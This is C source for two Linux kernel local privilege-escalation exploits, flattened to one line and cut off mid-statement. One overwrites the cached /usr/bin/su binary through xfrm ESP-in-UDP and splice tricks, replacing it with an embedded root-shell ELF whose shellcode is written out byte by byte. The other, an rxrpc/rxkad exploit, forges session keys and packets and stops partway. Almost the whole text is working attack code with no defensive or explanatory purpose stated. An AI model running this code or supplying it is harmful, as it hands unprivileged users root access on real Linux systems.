#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef SOL_UDP #define SOL_UDP 17 #endif #define ENC_PORT 4500 #define SEQ_VAL 200 #define REPLAY_SEQ 100 #define PATCH_OFFSET 0 /* overwrite whole ELF starting at file[0] */ #define PAYLOAD_LEN 192 /* bytes of shell_elf to write (48 triggers) */ #define ENTRY_OFFSET 0x78 /* shellcode entry inside the new ELF */ /* * 192-byte minimal x86_64 root-shell ELF. * _start at 0x400078: * setgid(0); setuid(0); setgroups(0, NULL); * execve("/bin/sh", NULL, ["TERM=xterm", NULL]); * PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X. * * Setting TERM in the new shell's env silences the * "tput: No value for $TERM" / "test: : integer expected" noise * /etc/bash.bashrc and friends emit when TERM is unset. * * Code (from offset 0x78): * 31 ff xor edi, edi * 31 f6 xor esi, esi * 31 c0 xor eax, eax * b0 6a mov al, 0x6a ; setgid * 0f 05 syscall * b0 69 mov al, 0x69 ; setuid * 0f 05 syscall * b0 74 mov al, 0x74 ; setgroups * 0f 05 syscall * 6a 00 push 0 ; envp[1] = NULL * 48 8d 05 12 00 00 00 lea rax, [rip+0x12] ; rax = "TERM=xterm" * 50 push rax ; envp[0] * 48 89 e2 mov rdx, rsp ; rdx = envp * 48 8d 3d 12 00 00 00 lea rdi, [rip+0x12] ; rdi = "/bin/sh" * 31 f6 xor esi, esi ; rsi = NULL (argv) * 6a 3b 58 push 0x3b ; pop rax ; rax = 59 (execve) * 0f 05 syscall ; execve("/bin/sh",NULL,envp) * "TERM=xterm\0" (offset 0xa5..0xaf) * "/bin/sh\0" (offset 0xb0..0xb7) */ static const uint8_t shell_elf[PAYLOAD_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, }; extern int g_su_verbose; int g_su_verbose = 0; #define SLOG(fmt, ...) do { if (g_su_verbose) fprintf(stderr, "[su] " fmt "\n", ##__VA_ARGS__); } while (0) static int write_proc(const char *path, const char *buf) { int fd = open(path, O_WRONLY); if (fd < 0) return -1; int n = write(fd, buf, strlen(buf)); close(fd); return n; } static void setup_userns_netns(void) { uid_t real_uid = getuid(); gid_t real_gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { SLOG("unshare: %s", strerror(errno)); exit(1); } write_proc("/proc/self/setgroups", "deny"); char map[64]; snprintf(map, sizeof(map), "0 %u 1", real_uid); if (write_proc("/proc/self/uid_map", map) < 0) { SLOG("uid_map: %s", strerror(errno)); exit(1); } snprintf(map, sizeof(map), "0 %u 1", real_gid); if (write_proc("/proc/self/gid_map", map) < 0) { SLOG("gid_map: %s", strerror(errno)); exit(1); } int s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { SLOG("socket: %s", strerror(errno)); exit(1); } struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "lo", IFNAMSIZ); if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG("SIOCGIFFLAGS: %s", strerror(errno)); exit(1); } ifr.ifr_flags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG("SIOCSIFFLAGS: %s", strerror(errno)); exit(1); } close(s); } static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len) { struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len)); rta->rta_type = type; rta->rta_len = RTA_LENGTH(len); memcpy(RTA_DATA(rta), data, len); nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len); } static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi) { int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (sk < 0) return -1; struct sockaddr_nl nl = { .nl_family = AF_NETLINK }; if (bind(sk, (struct sockaddr*)&nl, sizeof(nl)) < 0) { close(sk); return -1; } char buf[4096] = {0}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_pid = getpid(); nlh->nlmsg_seq = 1; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info)); struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); xs->id.daddr.a4 = inet_addr("127.0.0.1"); xs->id.spi = htonl(spi); xs->id.proto = IPPROTO_ESP; xs->saddr.a4 = inet_addr("127.0.0.1"); xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; xs->reqid = 0x1234; xs->flags = XFRM_STATE_ESN; xs->lft.soft_byte_limit = (uint64_t)-1; xs->lft.hard_byte_limit = (uint64_t)-1; xs->lft.soft_packet_limit = (uint64_t)-1; xs->lft.hard_packet_limit = (uint64_t)-1; xs->sel.family = AF_INET; xs->sel.prefixlen_d = 32; xs->sel.prefixlen_s = 32; xs->sel.daddr.a4 = inet_addr("127.0.0.1"); xs->sel.saddr.a4 = inet_addr("127.0.0.1"); { char alg_buf[sizeof(struct xfrm_algo_auth) + 32]; memset(alg_buf, 0, sizeof(alg_buf)); struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf; strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name)-1); aa->alg_key_len = 32 * 8; aa->alg_trunc_len = 128; memset(aa->alg_key, 0xAA, 32); put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf)); } { char alg_buf[sizeof(struct xfrm_algo) + 16]; memset(alg_buf, 0, sizeof(alg_buf)); struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf; strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name)-1); ea->alg_key_len = 16 * 8; memset(ea->alg_key, 0xBB, 16); put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf)); } { struct xfrm_encap_tmpl enc; memset(&enc, 0, sizeof(enc)); enc.encap_type = UDP_ENCAP_ESPINUDP; enc.encap_sport = htons(ENC_PORT); enc.encap_dport = htons(ENC_PORT); enc.encap_oa.a4 = 0; put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc)); } { char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4]; memset(esn_buf, 0, sizeof(esn_buf)); struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf; esn->bmp_len = 1; esn->oseq = 0; esn->seq = REPLAY_SEQ; esn->oseq_hi = 0; esn->seq_hi = patch_seqhi; esn->replay_window = 32; put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf)); } if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; } char rbuf[4096]; int n = recv(sk, rbuf, sizeof(rbuf), 0); if (n < 0) { close(sk); return -1; } struct nlmsghdr *rh = (struct nlmsghdr *)rbuf; if (rh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *e = NLMSG_DATA(rh); if (e->error) { close(sk); return -1; } } close(sk); return 0; } static int do_one_write(const char *path, off_t offset, uint32_t spi) { int sk_recv = socket(AF_INET, SOCK_DGRAM, 0); if (sk_recv < 0) return -1; int one = 1; setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); struct sockaddr_in sa_d = { .sin_family = AF_INET, .sin_port = htons(ENC_PORT), .sin_addr = { inet_addr("127.0.0.1") }, }; if (bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_recv); return -1; } int encap = UDP_ENCAP_ESPINUDP; if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { close(sk_recv); return -1; } int sk_send = socket(AF_INET, SOCK_DGRAM, 0); if (sk_send < 0) { close(sk_recv); return -1; } if (connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) { close(sk_send); close(sk_recv); return -1; } int file_fd = open(path, O_RDONLY); if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; } int pfd[2]; if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; } uint8_t hdr[24]; *(uint32_t*)(hdr + 0) = htonl(spi); *(uint32_t*)(hdr + 4) = htonl(SEQ_VAL); memset(hdr + 8, 0xCC, 16); struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) }; if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) { close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1; } off_t off = offset; ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE); if (s != 16) { close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1; } s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE); /* still proceed regardless of splice rc — kernel may have already * decrypted the page in the time between splice and recv */ usleep(150 * 1000); close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return s == 40 ? 0 : -1; } static int verify_byte(const char *path, off_t offset, uint8_t want) { int fd = open(path, O_RDONLY); if (fd < 0) return -1; uint8_t got; if (pread(fd, &got, 1, offset) != 1) { close(fd); return -1; } close(fd); return got == want ? 0 : -1; } static int corrupt_su(const char *su_target_path) { setup_userns_netns(); usleep(100 * 1000); /* Install 40 xfrm SAs, one per 4-byte chunk. Each carries the * desired payload word in its seq_hi field. */ for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uint32_t spi = 0xDEADBE10 + i; uint32_t seqhi = ((uint32_t)shell_elf[i*4 + 0] << 24) | ((uint32_t)shell_elf[i*4 + 1] << 16) | ((uint32_t)shell_elf[i*4 + 2] << 8) | ((uint32_t)shell_elf[i*4 + 3]); if (add_xfrm_sa(spi, seqhi) < 0) { SLOG("add_xfrm_sa #%d failed", i); return -1; } } SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4); for (int i = 0; i < PAYLOAD_LEN / 4; i++) { uint32_t spi = 0xDEADBE10 + i; off_t off = PATCH_OFFSET + i * 4; if (do_one_write(su_target_path, off, spi) < 0) { SLOG("do_one_write #%d at off=0x%lx failed", i, (long)off); return -1; } } SLOG("wrote %d bytes to %s starting at 0x%x", PAYLOAD_LEN, su_target_path, PATCH_OFFSET); return 0; } int su_lpe_main(int argc, char **argv) { for (int i = 1; i < argc; i++) { if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose")) g_su_verbose = 1; else if (!strcmp(argv[i], "--corrupt-only")) ; /* compat: this body always corrupts only */ } if (getenv("DIRTYFRAG_VERBOSE")) g_su_verbose = 1; const char *su_target_path = getenv("POC_SU_TARGET_FILE"); if (!su_target_path || !*su_target_path) su_target_path = "/usr/bin/su"; pid_t cpid = fork(); if (cpid < 0) return 1; if (cpid == 0) { int rc = corrupt_su(su_target_path); _exit(rc == 0 ? 0 : 2); } int cstatus; waitpid(cpid, &cstatus, 0); if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) { SLOG("corruption stage failed (status=0x%x)", cstatus); return 1; } /* Sanity check: bytes at the embedded ELF entry (file offset 0x78 * after our overwrite) should be 0x31 0xff (xor edi, edi — first * instruction of the new shellcode). */ if (verify_byte(su_target_path, ENTRY_OFFSET, 0x31) != 0 || verify_byte(su_target_path, ENTRY_OFFSET + 1, 0xff) != 0) { SLOG("post-write verify failed (target unchanged)"); return 1; } SLOG("%s page-cache patched (entry 0x%x = shellcode)", su_target_path, ENTRY_OFFSET); return 0; } /* * rxrpc/rxkad LPE — uid=1000 → root */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef AF_RXRPC #define AF_RXRPC 33 #endif #ifndef PF_RXRPC #define PF_RXRPC AF_RXRPC #endif #ifndef SOL_RXRPC #define SOL_RXRPC 272 #endif #ifndef SOL_ALG #define SOL_ALG 279 #endif #ifndef AF_ALG #define AF_ALG 38 #endif #ifndef MSG_SPLICE_PAGES #define MSG_SPLICE_PAGES 0x8000000 #endif /* ---- rxrpc constants ---- */ #define RXRPC_PACKET_TYPE_DATA 1 #define RXRPC_PACKET_TYPE_ACK 2 #define RXRPC_PACKET_TYPE_ABORT 4 #define RXRPC_PACKET_TYPE_CHALLENGE 6 #define RXRPC_PACKET_TYPE_RESPONSE 7 #define RXRPC_CLIENT_INITIATED 0x01 #define RXRPC_REQUEST_ACK 0x02 #define RXRPC_LAST_PACKET 0x04 #define RXRPC_CHANNELMASK 3 #define RXRPC_CIDSHIFT 2 struct rxrpc_wire_header { uint32_t epoch; uint32_t cid; uint32_t callNumber; uint32_t seq; uint32_t serial; uint8_t type; uint8_t flags; uint8_t userStatus; uint8_t securityIndex; uint16_t cksum; /* big-endian on wire */ uint16_t serviceId; } __attribute__((packed)); struct rxkad_challenge { uint32_t version; uint32_t nonce; uint32_t min_level; uint32_t __padding; } __attribute__((packed)); /* Attacker-chosen 8-byte session key used for the rxkad token. * Mutable because the LPE brute-force iterates over keys looking for * one that decrypts the file's UID field to a "0:" prefix. */ static uint8_t SESSION_KEY[8] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08 }; #define LOG(fmt, ...) fprintf(stderr, "[+] " fmt "\n", ##__VA_ARGS__) #define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__) #define DBG(fmt, ...) fprintf(stderr, "[.] " fmt "\n", ##__VA_ARGS__) /* =================================================================== */ /* unshare + map setup */ /* =================================================================== */ static int write_file(const char *path, const char *fmt, ...) { int fd = open(path, O_WRONLY); if (fd < 0) return -1; char buf[256]; va_list ap; va_start(ap, fmt); int n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); int r = (int)write(fd, buf, n); close(fd); return r; } static int do_unshare_userns_netns(void) { uid_t real_uid = getuid(); gid_t real_gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { WARN("unshare(NEWUSER|NEWNET): %s", strerror(errno)); return -1; } LOG("unshare(USER|NET) OK, real uid=%u", real_uid); write_file("/proc/self/setgroups", "deny"); if (write_file("/proc/self/uid_map", "%u %u 1", real_uid, real_uid) < 0) { WARN("uid_map: %s", strerror(errno)); return -1; } if (write_file("/proc/self/gid_map", "%u %u 1", real_gid, real_gid) < 0) { WARN("gid_map: %s", strerror(errno)); return -1; } LOG("uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns", real_uid, real_gid); /* ifup lo */ int s = socket(AF_INET, SOCK_DGRAM, 0); if (s >= 0) { struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, "lo"); if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { ifr.ifr_flags |= IFF_UP | IFF_RUNNING; if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) WARN("SIOCSIFFLAGS lo: %s", strerror(errno)); else LOG("lo brought UP in new netns"); } close(s); } return 0; } /* =================================================================== */ /* rxrpc key (rxkad v1 token with attacker session key) */ /* =================================================================== */ static long key_add(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(SYS_add_key, type, desc, payload, plen, ringid); } static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen) { uint8_t *p = out; uint32_t now = (uint32_t)time(NULL); uint32_t expires = now + 86400; *(uint32_t *)p = htonl(0); p += 4; /* flags */ const char *cell = "evil"; uint32_t clen = strlen(cell); *(uint32_t *)p = htonl(clen); p += 4; memcpy(p, cell, clen); uint32_t pad = (4 - (clen & 3)) & 3; memset(p + clen, 0, pad); p += clen + pad; *(uint32_t *)p = htonl(1); p += 4; /* ntoken */ uint8_t *toklen_p = p; p += 4; uint8_t *tokstart = p; *(uint32_t *)p = htonl(2); p += 4; /* sec_ix = RXKAD */ *(uint32_t *)p = htonl(0); p += 4; /* vice_id */ *(uint32_t *)p = htonl(1); p += 4; /* kvno */ memcpy(p, SESSION_KEY, 8); p += 8; /* session_key K */ *(uint32_t *)p = htonl(now); p += 4; *(uint32_t *)p = htonl(expires); p += 4; *(uint32_t *)p = htonl(1); p += 4; /* primary_flag */ *(uint32_t *)p = htonl(8); p += 4; /* ticket_len */ memset(p, 0xCC, 8); p += 8; /* ticket */ uint32_t toklen = (uint32_t)(p - tokstart); *(uint32_t *)toklen_p = htonl(toklen); if ((size_t)(p - out) > maxlen) { errno = E2BIG; return -1; } return (int)(p - out); } static long add_rxrpc_key(const char *desc) { uint8_t buf[512]; int n = build_rxrpc_v1_token(buf, sizeof(buf)); if (n < 0) return -1; return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING); } /* =================================================================== */ /* AF_ALG pcbc(fcrypt) helpers */ /* =================================================================== */ static int alg_open_pcbc_fcrypt(const uint8_t key[8]) { int s = socket(AF_ALG, SOCK_SEQPACKET, 0); if (s < 0) { WARN("socket(AF_ALG): %s", strerror(errno)); return -1; } struct sockaddr_alg sa = { .salg_family = AF_ALG }; strcpy((char *)sa.salg_type, "skcipher"); strcpy((char *)sa.salg_name, "pcbc(fcrypt)"); if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { WARN("bind(AF_ALG pcbc(fcrypt)): %s", strerror(errno)); close(s); return -1; } if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) { WARN("ALG_SET_KEY: %s", strerror(errno)); close(s); return -1; } return s; } /* Encrypt-or-decrypt a 1+ block of data with a given IV. */ static int alg_op(int alg_s, int op, const uint8_t iv[8], const void *in, size_t inlen, void *out) { int op_fd = accept(alg_s, NULL, NULL); if (op_fd < 0) { WARN("accept(AF_ALG): %s", strerror(errno)); return -1; } char cbuf[CMSG_SPACE(sizeof(int)) + CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0}; struct msghdr msg = {0}; msg.msg_control = cbuf; msg.msg_controllen = sizeof(cbuf); struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int)); *(int *)CMSG_DATA(c) = op; c = CMSG_NXTHDR(&msg, c); c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_IV; c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8); struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c); aiv->ivlen = 8; memcpy(aiv->iv, iv, 8); struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen }; msg.msg_iov = &iov; msg.msg_iovlen = 1; if (sendmsg(op_fd, &msg, 0) < 0) { WARN("AF_ALG sendmsg: %s", strerror(errno)); close(op_fd); return -1; } ssize_t n = read(op_fd, out, inlen); close(op_fd); if (n != (ssize_t)inlen) { WARN("AF_ALG read got %zd want %zu: %s", n, inlen, strerror(errno)); return -1; } return 0; } /* Compute conn->rxkad.csum_iv (ref: rxkad_prime_packet_security): * tmpbuf[0..3] = htonl(epoch, cid, 0, security_ix) (16 B) * PCBC-encrypt(tmpbuf, IV=session_key) → out[16] * csum_iv = out[8..15] (last 8 B = "tmpbuf[2..3]" after encryption) */ static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix, const uint8_t key[8], uint8_t csum_iv[8]) { int s = alg_open_pcbc_fcrypt(key); if (s < 0) return -1; uint32_t in[4] = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) }; uint8_t out[16]; int rc = alg_op(s, ALG_OP_ENCRYPT, key, in, 16, out); close(s); if (rc < 0) return -1; memcpy(csum_iv, out + 8, 8); return 0; } /* Compute the wire cksum (ref: rxkad_secure_packet @rxkad.c:342): * x = (cid_low2 << 30) | (seq & 0x3fffffff) * buf[0] = htonl(call_id), buf[1] = htonl(x) (8 B) * PCBC-encrypt(buf, IV=csum_iv) → enc[8] * y = ntohl(enc[1]); cksum = (y >> 16) & 0xffff; if zero -> 1 */ static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq, const uint8_t key[8], const uint8_t csum_iv[8], uint16_t *cksum_out) { int s = alg_open_pcbc_fcrypt(key); if (s < 0) return -1; uint32_t x = (cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT); x |= seq & 0x3fffffff; uint32_t in[2] = { htonl(call_id), htonl(x) }; uint32_t out[2]; int rc = alg_op(s, ALG_OP_ENCRYPT, csum_iv, in, 8, out); close(s); if (rc < 0) return -1; uint32_t y = ntohl(out[1]); uint16_t v = (y >> 16) & 0xffff; if (v == 0) v = 1; *cksum_out = v; return 0; } /* =================================================================== */ /* AF_RXRPC client */ /* =================================================================== */ static int setup_rxrpc_client(uint16_t local_port, const char *keyname) { int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); if (fd < 0) { WARN("socket(AF_RXRPC client): %s", strerror(errno)); return -1; } if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY, keyname, strlen(keyname)) < 0) { WARN("client SECURITY_KEY: %s", strerror(errno)); close(fd); return -1; } int min_level = RXRPC_SECURITY_AUTH; if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL, &min_level, sizeof(min_level)) < 0) { WARN("client MIN_SECURITY_LEVEL: %s", strerror(errno)); close(fd); return -1; } struct sockaddr_rxrpc srx = {0}; srx.srx_family = AF_RXRPC; srx.srx_service = 0; srx.transport_type = SOCK_DGRAM; srx.transport_len = sizeof(struct sockaddr_in); srx.transport.sin.sin_family = AF_INET; srx.transport.sin.sin_port = htons(local_port); srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001); if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) { WARN("client bind :%u: %s", local_port, strerror(errno)); close(fd); return -1; } LOG("AF_RXRPC client bound :%u", local_port); return fd; } static int rxrpc_client_initiate_call(int cli_fd, uint16_t srv_port, uint16_t service_id, unsigned long user_call_id) { char data[8] = "PINGPING"; struct sockaddr_rxrpc srx = {0}; srx.srx_family = AF_RXRPC; srx.srx_service = service_id; srx.transport_type = SOCK_DGRAM; srx.transport_len = sizeof(struct sockaddr_in); srx.transport.sin.sin_family = AF_INET; srx.transport.sin.sin_port = htons(srv_port); srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001); char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))]; struct msghdr msg = {0}; msg.msg_name = &srx; msg.msg_namelen = sizeof(srx); struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) }; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf); struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_level = SOL_RXRPC; cmsg->cmsg_type = RXRPC_USER_CALL_ID; cmsg->cmsg_len = CMSG_LEN(sizeof(unsigned long)); *(unsigned long *)CMSG_DATA(cmsg) = user_call_id; /* Don't block forever if no reply ever comes through this single sendmsg. */ int fl = fcntl(cli_fd, F_GETFL); fcntl(cli_fd, F_SETFL, fl | O_NONBLOCK); ssize_t n = sendmsg(cli_fd, &msg, 0); fcntl(cli_fd, F_SETFL, fl); if (n < 0) { if (errno == EAGAIN || errno == EWOULDBLOCK) { LOG("client sendmsg returned EAGAIN (expected; kernel will keep " "retrying handshake)"); return 0; } WARN("client sendmsg: %s", strerror(errno)); return -1; } LOG("client sendmsg %zd B → :%u (handshake will follow asynchronously)", n, srv_port); return 0; } /* =================================================================== */ /* fake-server (plain UDP) */ /* =================================================================== */ static int setup_udp_server(uint16_t port) { int s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { WARN("socket(udp server): %s", strerror(errno)); return -1; } struct sockaddr_in sa = {0}; sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr.s_addr = htonl(0x7F000001); if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { WARN("udp server bind :%u: %s", port, strerror(errno)); close(s); return -1; } LOG("plain UDP fake-server bound :%u", port); return s; } /* Receive one UDP datagram with timeout (ms). Returns bytes or -1. */ static ssize_t udp_recv_to(int s, void *buf, size_t cap, struct sockaddr_in *from, int timeout_ms) { struct pollfd pfd = { .fd = s, .events = POLLIN }; int rc = poll(&pfd, 1, timeout_ms); if (rc <= 0) return -1; socklen_t fl = from ? sizeof(*from) : 0; return recvfrom(s, buf, cap, 0, (struct sockaddr *)from, from ? &fl : NULL); } /* =================================================================== */ /* main PoC */ /* =================================================================== */ static int trigger_seq = 0; static int do_one_trigger(int target_fd, off_t splice_off, size_t splice_len) { char keyname[32]; snprintf(keyname, sizeof(keyname), "evil%d", trigger_seq++); long key = add_rxrpc_key(keyname); if (key < 0) { if (trigger_seq < 5) WARN("add_rxrpc_key(%s): %s", keyname, strerror(errno)); return -1; } /* Use varying ports so kernel TIME_WAIT / stale state does not bite. */ uint16_t port_S = 7777 + (trigger_seq * 2 % 200); uint16_t port_C = port_S + 1; uint16_t svc_id = 1234; int udp_srv = setup_udp_server(port_S); if (udp_srv < 0) { if (trigger_seq < 5) WARN("setup_udp_server(%u) failed", port_S); syscall(SYS_keyctl, 3 /*KEYCTL_INVALIDATE*/, key); return -1; } int rxsk_cli = setup_rxrpc_client(port_C, keyname); if (rxsk_cli < 0) { if (trigger_seq < 5) WARN("setup_rxrpc_client(%u, %s) failed", port_C, keyname); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } if (rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD) < 0) { if (trigger_seq < 5) WARN("rxrpc_client_initiate_call failed"); close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } uint8_t pkt[2048]; struct sockaddr_in cli_addr; ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500); if (n < (ssize_t)sizeof(struct rxrpc_wire_header)) { if (trigger_seq < 5) WARN("udp_recv_to: n=%zd errno=%s", n, strerror(errno)); close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } struct rxrpc_wire_header *whdr_in = (struct rxrpc_wire_header *)pkt; uint32_t epoch = ntohl(whdr_in->epoch); uint32_t cid = ntohl(whdr_in->cid); uint32_t callN = ntohl(whdr_in->callNumber); uint16_t svc_in = ntohs(whdr_in->serviceId); uint16_t cli_port = ntohs(cli_addr.sin_port); /* Send CHALLENGE */ { struct { struct rxrpc_wire_header hdr; struct rxkad_challenge ch; } __attribute__((packed)) c = {0}; c.hdr.epoch = htonl(epoch); c.hdr.cid = htonl(cid); c.hdr.callNumber = 0; c.hdr.seq = 0; c.hdr.serial = htonl(0x10000); c.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE; c.hdr.securityIndex = 2; c.hdr.serviceId = htons(svc_in); c.ch.version = htonl(2); c.ch.nonce = htonl(0xDEADBEEFu); c.ch.min_level = htonl(1); struct sockaddr_in to = { .sin_family=AF_INET, .sin_port=htons(cli_port), .sin_addr.s_addr=htonl(0x7F000001) }; if (sendto(udp_srv, &c, sizeof(c), 0, (struct sockaddr*)&to, sizeof(to)) < 0) { close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } } /* Drain RESPONSE (best-effort) */ for (int i = 0; i < 4; i++) { struct sockaddr_in src; if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break; } /* csum + cksum with CURRENT SESSION_KEY */ uint8_t csum_iv[8] = {0}; if (compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv) < 0) { close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } uint16_t cksum_h = 0; if (compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h) < 0) { close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1; } /* Build malicious DATA header */ struct rxrpc_wire_header mal = {0}; mal.epoch = htonl(epoch); mal.cid = htonl(cid); mal.callNumber 